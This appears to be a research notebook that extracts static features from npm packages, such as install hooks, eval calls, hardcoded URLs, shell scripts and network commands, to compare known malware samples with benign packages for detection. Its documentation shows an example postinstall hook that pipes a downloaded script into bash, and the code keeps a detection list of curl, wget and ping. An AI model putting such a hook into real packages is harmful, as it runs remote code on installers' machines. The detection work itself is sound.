In [None]:
import os
import tarfile
import json
import re
import pandas as pd

### Function: `strip_comments`
This function removes both single-line and multi-line comments from a given string, such as source code or text files. It uses regular expressions to find and remove comments while keeping the rest of the content intact.

#### Parameters:
- **contents** (`str`): The input string, which can be code or text that might contain comments.

#### How It Works:
1. **Single-line comments**:
   - These are the comments that start with `//` and continue to the end of the line.
   - The function identifies them using the pattern `//.*\n`, which looks for everything after `//` until the end of the line.
   - Once identified, these comments are replaced with a single newline (`\n`), so your line breaks stay intact.

2. **Multi-line comments**:
   - These comments are the ones wrapped in `/*` and `*/`, and they can span multiple lines.
   - The function uses `/\*.*?\*/` with some extra handling (thanks to `re.DOTALL`) to capture comments even if they stretch across several lines.
   - After identifying them, it simply removes them from the string, leaving the rest of your content clean. This step runs after the single-line comments have been removed.


In [None]:
def strip_comments(contents):
    """Remove JavaScript-style comments from a string.

    Args:
        contents (str): Source text that may contain ``//`` and ``/* */``
            comments.

    Returns:
        str: ``contents`` with every ``//`` comment cut back to (but not
        including) its line break, and every ``/* ... */`` comment removed.

    Note:
        This is a regex heuristic, not a tokenizer: a ``//`` or ``/*`` that
        appears inside a string literal (for example the ``//`` of a URL) is
        treated as the start of a comment too.
    """
    # `.` never matches a line break, so this consumes the comment up to the
    # end of its line and leaves the line break in place. Not requiring a
    # trailing "\n" also strips a comment on the last line of a file that has
    # no final newline.
    single_line_pattern = re.compile(r'//.*')
    contents = single_line_pattern.sub('', contents)

    # DOTALL lets `.` cross line breaks; the lazy `.*?` stops at the first "*/".
    multi_line_pattern = re.compile(r'/\*.*?\*/', re.DOTALL)
    contents = multi_line_pattern.sub('', contents)

    return contents

### Function: `get_directories`

This function helps you retrieve all the directories inside a specified folder. It’s useful when you want to filter out files and just focus on the subdirectories within a given directory.

#### Parameters:
- **directory** (`str`): The path to the directory where you want to search for subdirectories.

#### How It Works:
1. **List all items**: The function starts by listing everything inside the specified directory (both files and folders).
2. **Filter directories**: It then filters this list to keep only the directories, ignoring any files or other items.
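3. **Return**: Finally, it returns a list containing the names of all subdirectories.

This is primarily used to iterate over each npm package in the folder. For example, if `path` contains the directories `folder1` and `folder2` plus some files, the function returns `['folder1', 'folder2']` (in whatever order the operating system lists them).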


In [None]:
def get_directories(directory):
    """Return the names of the immediate subdirectories of ``directory``.

    Args:
        directory (str): Path of the folder to inspect.

    Returns:
        list[str]: Entry names (not full paths) for which ``os.path.isdir``
        is true, in the order ``os.listdir`` reports them.
    """
    subdirectory_names = []
    for entry_name in os.listdir(directory):
        # listdir yields bare names, so rebuild the full path for the check.
        entry_path = os.path.join(directory, entry_name)
        if os.path.isdir(entry_path):
            subdirectory_names.append(entry_name)
    return subdirectory_names

### Function: `check_post_install`

This function checks whether a specific `package.json` file inside a given folder contains any `preinstall`, `postinstall`, or `install` scripts. It's a helpful way to see if a package might run something during installation, which could be important when assessing package behavior.

#### Parameters:
- **folder** (`str`): The folder where you want to search for a `package.json` file.

#### How It Works:
1. **Search for `package.json`**: The function walks through all the directories and files inside the specified folder, looking for a `package.json` file.
2. **Read and parse `package.json`**: Once the `package.json` file is found, it tries to read and parse its contents as JSON.
3. **Check for scripts**: It checks if the `scripts` section of `package.json` contains any of the following:
   - `preinstall`
   - `postinstall`
   - `install`
4. **Return result**: If any of these scripts are present, the function returns `True`, indicating that one of these scripts exists. If no such scripts are found, or if there's an error, it returns `False`.

In [None]:
def check_post_install(folder):
    """Report whether any ``package.json`` under ``folder`` declares an install hook.

    Every ``package.json`` found while walking ``folder`` recursively is
    parsed; the search stops at the first one whose ``scripts`` object has a
    ``preinstall``, ``postinstall`` or ``install`` key.

    Args:
        folder (str): Root folder to search.

    Returns:
        bool: ``True`` if such a hook is declared, otherwise ``False``.
        Manifests that cannot be read or parsed are reported on stdout and
        skipped; manifests whose top level or ``scripts`` entry is not a JSON
        object are skipped.
    """
    install_hooks = ("preinstall", "postinstall", "install")

    for root, _dirs, files in os.walk(folder):
        if "package.json" not in files:
            continue
        file_path = os.path.join(root, "package.json")

        # Only reading/parsing is guarded, so a failure here cannot be
        # confused with a problem in the checks below.
        try:
            with open(file_path, 'r', encoding='utf-8', errors='ignore') as manifest:
                contents = json.load(manifest)
        except (OSError, ValueError, RecursionError) as e:
            # json.JSONDecodeError is a ValueError; RecursionError covers
            # pathologically nested JSON. Best effort: report and move on.
            print(f"{file_path} - {e}")
            continue

        # Valid JSON is not necessarily an object, and "scripts" may be null
        # or a string; only a real mapping can declare lifecycle hooks.
        scripts = contents.get("scripts") if isinstance(contents, dict) else None
        if not isinstance(scripts, dict):
            continue

        if any(hook in scripts for hook in install_hooks):
            return True
    return False

### Function: `check_modules_used`

This function scans JavaScript files within a specified folder to find and list the modules that are being imported or required. It helps identify the external dependencies that a project or file uses.

#### Parameters:
- **folder** (`str`): The path to the folder where you want to search for JavaScript files.

#### How It Works:
1. **Initialize the module tracker**: The function starts by creating an empty set called `modules_used` to keep track of the modules it finds.
   
2. **Loop through all files**: It recursively walks through the folder, examining all files. If a file ends with `.js`, it’s considered a JavaScript file, and its contents are processed.
   
3. **Remove comments**: Before analyzing the file's contents, it strips out comments using the `strip_comments` function to avoid parsing modules mentioned in comments.
   
4. **Identify modules**: It looks for two types of imports:
   - **CommonJS imports**: These are found using `require()` calls, typical in Node.js.
   - **ECMAScript module imports**: These are found using the `import` keyword.
   
   Both patterns are captured using regular expressions, and any modules found are added to the `modules_used` set.
   
5. **Return the result**: After scanning all the files, the function returns a set of all the unique modules that were imported across all JavaScript files in the folder.

#### Example:

Suppose the folder contains a JavaScript file like this:

```javascript
// A sample JavaScript file
const fs = require('fs');
import axios from 'axios';
```
Running `check_modules_used("/path/to/folder")` would return a set like this:

```python
{'fs', 'axios'}
```

In [None]:
def check_modules_used(folder):
    """Collect the module names imported by the JavaScript files under ``folder``.

    Every file whose name ends in ``.js`` is read, stripped of comments with
    ``strip_comments``, and scanned for two import forms:

    * CommonJS: ``require('name')`` / ``require("name")``
    * ES modules: ``import <bindings> from 'name'`` (default, named ``{...}``
      and ``* as ns`` bindings)

    Args:
        folder (str): Root folder to search recursively.

    Returns:
        set[str]: The distinct module specifiers found, e.g. ``{'fs', 'axios'}``.
    """
    # Compiled once, outside the file loop. The quote class is ['"] only; the
    # module specifier is captured so findall() returns just the name, and it
    # may contain any non-quote character ("node-fetch", "@scope/pkg", "./x").
    require_call = re.compile(r"require\(\s*['\"]([^'\"\n]+)['\"]\s*\)")
    import_from = re.compile(
        r"\bimport\b[\w$*{},\s]*?\bfrom\b\s*['\"]([^'\"\n]+)['\"]"
    )

    modules_used = set()
    for root, _dirs, files in os.walk(folder):
        for file_name in files:
            if not file_name.endswith(".js"):
                continue
            file_path = os.path.join(root, file_name)
            with open(file_path, "r", encoding='utf-8', errors='ignore') as source:
                # Comments are removed first so modules that are only
                # mentioned in a comment are not counted.
                contents = strip_comments(source.read())

            modules_used.update(require_call.findall(contents))
            modules_used.update(import_from.findall(contents))

    return modules_used

### Function: `check_eval_usage`

This function scans all JavaScript files within a specified folder to check if any of them use the potentially unsafe `eval()` function. The `eval()` function can execute arbitrary code.

#### Parameters:
- **folder** (`str`): The path to the folder where you want to search for JavaScript files.

#### How It Works:
1. **Search through all files**: The function walks through the folder and all its subdirectories, examining each file.
   
2. **Target JavaScript files**: It only checks files with the `.js` extension, which are JavaScript files.

3. **Remove comments**: Before analyzing the content, it uses the `strip_comments` function to remove comments, ensuring that `eval()` mentioned in comments is ignored.

4. **Check for `eval()`**: The function searches for any occurrence of the `eval(` keyword in the file content. If it finds it, it immediately returns `True`, indicating that `eval()` is used in that file.

5. **Return result**: If none of the files contain `eval()`, the function returns `False`.

In [None]:
def check_eval_usage(folder):
    """Report whether any JavaScript file under ``folder`` calls ``eval``.

    Every file whose name ends in ``.js`` is read, stripped of comments with
    ``strip_comments``, and searched for a call to ``eval``. The search stops
    at the first hit.

    Args:
        folder (str): Root folder to search recursively.

    Returns:
        bool: ``True`` if a call is found in any file, otherwise ``False``.
    """
    # The word boundary keeps identifiers that merely end in "eval"
    # (e.g. "retrieval(") from matching; optional whitespace before the
    # parenthesis still catches "eval (".
    eval_call = re.compile(r"\beval\s*\(")

    for root, _dirs, files in os.walk(folder):
        for file_name in files:
            if not file_name.endswith(".js"):
                continue
            file_path = os.path.join(root, file_name)
            with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
                contents = strip_comments(f.read())
            if eval_call.search(contents):
                return True
    return False

### Function: `search_url_and_ip_address`

This function scans JavaScript files in a given directory to detect any URLs or IP addresses. It uses regular expressions to identify patterns that match URLs and IPv4 addresses.

#### Parameters:
- **directory** (`str`): The path to the directory where you want to search for JavaScript files.

#### How It Works:
1. **Define the search pattern**: The function uses a regular expression to match both:
   - **URLs** (e.g., `http://example.com`, `https://site.com`, `ftp://fileserver.com`)
   - **IP addresses** in IPv4 format (e.g., `192.168.0.1`).
   
2. **Search through JavaScript files**: It walks through the specified directory and all its subdirectories, looking for `.js` files.

3. **Read and search the files**: For each JavaScript file, it reads the contents and searches for URLs or IP addresses using the defined pattern.

4. **Return result**: If any URLs or IP addresses are found in the file, the function returns `True`. If no such patterns are found, it returns `False`.

In [None]:
def search_url_and_ip_address(directory):
    """Report whether any JavaScript file under ``directory`` contains a URL or IPv4-like literal.

    Every file whose name ends in ``.js`` is read in full (comments are not
    stripped) and searched with one regular expression that matches either an
    ``http://``, ``https://`` or ``ftp://`` URL, or four dot-separated groups
    of one to three digits. The search stops at the first hit.

    Args:
        directory (str): Root folder to search recursively.

    Returns:
        bool: ``True`` if a match is found in any file, otherwise ``False``.
    """
    # Create a regular expression pattern to match URLs and IP addresses
    pattern = re.compile(r'\b(?:(?:https?|ftp):\/\/[^\s/$.?#].[^\s]*)|(?:(?:\d{1,3}\.){3}\d{1,3}\b)')

    # Walk through the directory and search for JavaScript files
    for root, _dirs, files in os.walk(directory):
        for file_name in files:
            if not file_name.endswith(".js"):
                continue
            file_path = os.path.join(root, file_name)
            with open(file_path, "r", encoding='utf-8', errors='ignore') as f:
                contents = f.read()

            # Only presence matters, so stop at the first match instead of
            # collecting every occurrence.
            if pattern.search(contents):
                return True

    # Explicit negative result; falling off the end would return None.
    return False

### Function: `find_files`

This function scans through a directory to find any files that match a specific set of extensions, such as shell scripts (`.sh`, `.bash`, `.bat`, `.zsh`).

#### Parameters:
- **directory** (`str`): The path to the directory where you want to search for files.

#### How It Works:
1. **Define target extensions**: The function is set up to look for files with the following extensions:
   - `.sh` (Shell scripts)
   - `.bash` (Bash scripts)
   - `.bat` (Batch files for Windows)
   - `.zsh` (Zsh scripts)
   
2. **Walk through the directory**: The function walks through the specified directory and all its subdirectories, checking each file it encounters.

3. **Match extensions**: For each file, it checks if the filename ends with any of the extensions defined in the list. If a match is found, the function returns `True`, indicating that at least one matching file exists.

4. **Return result**: If no files with the target extensions are found, the function returns `False`.

In [None]:
def find_files(directory):
    """Report whether ``directory`` contains a shell or batch script file.

    Args:
        directory (str): Root folder to search recursively.

    Returns:
        bool: ``True`` as soon as a file name ending in ``.sh``, ``.bash``,
        ``.bat`` or ``.zsh`` is seen, otherwise ``False``.
    """
    # str.endswith accepts a tuple and is true if any suffix matches.
    script_suffixes = (".sh", ".bash", ".bat", ".zsh")
    for _root, _dirs, filenames in os.walk(directory):
        if any(name.endswith(script_suffixes) for name in filenames):
            return True
    return False

### Function: `check_curl_used`

This function checks if any `package.json` files in a directory contain a reference to the commands `curl`, `wget`, or `ping` in their scripts.
#### Parameters:
- **directory** (`str`): The path to the directory where you want to search for `package.json` files.

#### How It Works:
1. **Search for `package.json` files**: The function walks through the specified directory and its subdirectories, looking for any `package.json` files.
   
2. **Read and parse `package.json`**: Once a `package.json` file is found, it attempts to read and parse the file's contents as JSON.

3. **Check for scripts**: It looks for a `scripts` section in the `package.json` file, which may include various lifecycle hooks like `preinstall`, `postinstall`, or `install`.

4. **Search for specific commands**: The function then checks if any of these lifecycle scripts use the following network-related commands:
   - `curl`
   - `wget`
   - `ping`

5. **Return result**: If any of these commands are found in the script section, the function returns `True`. If no such scripts or commands are found, it returns `False`. If an error occurs while reading the `package.json` file, it logs the error and moves on to the next file.

#### Example:

Consider the following `package.json`:

```json
{
  "name": "example-package",
  "version": "1.0.0",
  "scripts": {
    "postinstall": "curl http://example.com/setup.sh | bash"
  }
}
```


In [None]:
def check_curl_used(directory):
    """Report whether an install hook in any ``package.json`` invokes ``curl``, ``wget`` or ``ping``.

    Every ``package.json`` found while walking ``directory`` recursively is
    parsed, and the ``preinstall``, ``postinstall`` and ``install`` entries of
    its ``scripts`` object are searched for one of the three command names as
    a whole word. The search stops at the first hit.

    Args:
        directory (str): Root folder to search.

    Returns:
        bool: ``True`` if a hook mentions one of the commands, otherwise
        ``False``. Manifests that cannot be read or parsed are reported on
        stdout and skipped; manifests whose top level or ``scripts`` entry is
        not a JSON object, and hook values that are not strings, are skipped.
    """
    lifecycle_hooks = ("preinstall", "postinstall", "install")
    # Whole-word match: a plain substring test would flag "typings install"
    # or "mapping.js" because they contain "ping".
    network_command = re.compile(r"\b(?:curl|wget|ping)\b")

    for root, _dirs, files in os.walk(directory):
        if "package.json" not in files:
            continue
        file_path = os.path.join(root, "package.json")

        # Read the contents of the package.json file
        try:
            with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
                contents = json.load(f)
        except (OSError, ValueError, RecursionError) as e:
            # json.JSONDecodeError is a ValueError; RecursionError covers
            # pathologically nested JSON. Best effort: report and move on.
            print(f"Error reading {file_path}: {e}")
            continue

        # Valid JSON is not necessarily an object, and "scripts" may be null
        # or a string; indexing those would raise and abort the whole scan.
        scripts = contents.get("scripts") if isinstance(contents, dict) else None
        if not isinstance(scripts, dict):
            continue

        for hook in lifecycle_hooks:
            command = scripts.get(hook)
            if isinstance(command, str) and network_command.search(command):
                return True
    return False

### Function: `extract_features`

This function analyzes a directory of packages and extracts various features defined in the paper. It consolidates information such as module usage, the presence of certain scripts, and the use of external resources into a CSV file.

#### Parameters:
- **file_path** (`str`): The path to the directory containing the packages you want to analyze.
- **output** (`str`): The path where the results (in CSV format) should be saved.

#### How It Works:
1. **Get the list of directories**: The function first gathers a list of directories (representing packages) from the provided `file_path`. It skips unnecessary directories like `.ipynb_checkpoints`.

2. **Feature extraction for each package**: For each package, the function performs a series of checks:
   - **Scripts**: It checks if the package includes installation scripts such as `preinstall`, `postinstall`, or `install` by using the `check_post_install()` function.
   - **Modules used**: It identifies the modules used in the package’s JavaScript files via `check_modules_used()`.
   - **`eval()` usage**: It determines whether the `eval()` function is used using `check_eval_usage()`.
   - **URLs and IP addresses**: It searches for hardcoded URLs and IP addresses within the package using `search_url_and_ip_address()`.
   - **Bash files**: It checks if the package includes any shell or batch script files via `find_files()`.
   - **Network-related commands**: It checks for the presence of commands like `curl`, `wget`, or `ping` in the package’s lifecycle scripts using `check_curl_used()`.

3. **Track specific modules**: The function also tracks the usage of specific Node.js modules that may indicate external interaction or privilege usage, such as:
   - `fs`, `node-fetch`, `child_process`, `https`, `http`, `crypto`, `os`, `node-serialize`, `axios`, `querystring`, `dns`, `path`.

   It adds a boolean value for each module, indicating whether or not it is used by the package.

4. **Create and save the dataframe**:
   - The data is stored in a Pandas DataFrame, where each row corresponds to a package and each column represents a feature.
   - A combined column, `https_or_http`, is created to indicate if either the `https` or `http` module is used.
   - The resulting feature set is saved as a CSV file in the specified output directory.

In [None]:
def extract_features(file_path, output):
    """Extract one feature row per package folder and write them to ``feature.csv``.

    Each immediate subdirectory of ``file_path`` (except
    ``.ipynb_checkpoints``) is treated as one package whose contents live in
    its ``package/`` subfolder. For every package the sibling checks in this
    file are run and the results stored in one row, together with one boolean
    per tracked Node.js module. The ``https`` and ``http`` flags are merged
    into a single ``https_or_http`` column.

    Args:
        file_path (str): Directory containing one folder per package.
        output (str): Existing directory in which ``feature.csv`` is written.

    Returns:
        None. The result is the CSV file ``<output>/feature.csv``; when
        ``file_path`` holds no package folders the file contains only the
        header row.
    """
    # Extract libraries
    tracked_modules = ["fs", "node-fetch", "child_process", "https", "http", "crypto", "os",
                       "node-serialize", "axios", "querystring", "dns", "path"]

    rows = []
    for package in get_directories(file_path):
        if package == ".ipynb_checkpoints":
            continue
        package_path = os.path.join(file_path, package, 'package/')

        # bool() normalises any falsy "nothing found" result (including None)
        # so every feature column holds real booleans.
        row = {"package_name": package}
        row["entry_through_script"] = bool(check_post_install(package_path))
        row["modules_used"] = check_modules_used(package_path)
        row["eval"] = bool(check_eval_usage(package_path))
        row["has_ip_or_address"] = bool(search_url_and_ip_address(package_path))
        row["has_bash_file"] = bool(find_files(package_path))
        row["curl"] = bool(check_curl_used(package_path))

        for tracked_module in tracked_modules:
            row[tracked_module] = tracked_module in row["modules_used"]
        rows.append(row)

    # Naming the columns explicitly keeps the frame well-formed (and the
    # "https"/"http" lookups below valid) even when there are no rows.
    columns = ["package_name", "entry_through_script", "modules_used", "eval",
               "has_ip_or_address", "has_bash_file", "curl", *tracked_modules]
    dataframe = pd.DataFrame(rows, columns=columns)

    # astype(bool) is a no-op for populated frames and gives the empty frame
    # a dtype on which `|` is defined.
    dataframe["https_or_http"] = dataframe["https"].astype(bool) | dataframe["http"].astype(bool)
    dataframe = dataframe.drop(columns=["https", "http"])

    dataframe.to_csv(os.path.join(output, "feature.csv"), index=False)

### Extract Backstabbers Features

In [None]:
# Run the feature extraction over the Backstabbers sample folders;
# extract_features writes the result to "<result_destination>/feature.csv".
source_folder_path = "./Packages/Malware Backstabbers/npm_extracted"
result_destination = "./Packages/Malware Backstabbers"
extract_features(source_folder_path, result_destination)

### Extract MalOSS Features

In [None]:
# Run the feature extraction over the MalOSS sample folders;
# extract_features writes the result to "<result_destination>/feature.csv".
source_folder_path = "./Packages/Malware MalOSS/npmjs-samples_extracted"
result_destination = "./Packages/Malware MalOSS"
extract_features(source_folder_path, result_destination)

### Extract Collected Own

In [None]:
# Run the feature extraction over the self-collected malware sample folders;
# extract_features writes the result to "<result_destination>/feature.csv".
source_folder_path = "./Packages/Malware Own/npm_extracted2"
result_destination = "./Packages/Malware Own"
extract_features(source_folder_path, result_destination)

### Extract Benign Target

In [None]:
# Run the feature extraction over the benign "Target Packages" folders;
# extract_features writes the result to "<result_destination>/feature.csv".
source_folder_path = "./Packages/Benign Packages/Target Packages/packages_extracted"
result_destination = "./Packages/Benign Packages/Target Packages"
extract_features(source_folder_path, result_destination)

### Extract Benign Popular

In [None]:
# Run the feature extraction over the benign "Most Downloaded" folders;
# extract_features writes the result to "<result_destination>/feature.csv".
source_folder_path = "./Packages/Benign Packages/Most Downloaded/packages_extracted"
result_destination = "./Packages/Benign Packages/Most Downloaded"
extract_features(source_folder_path, result_destination)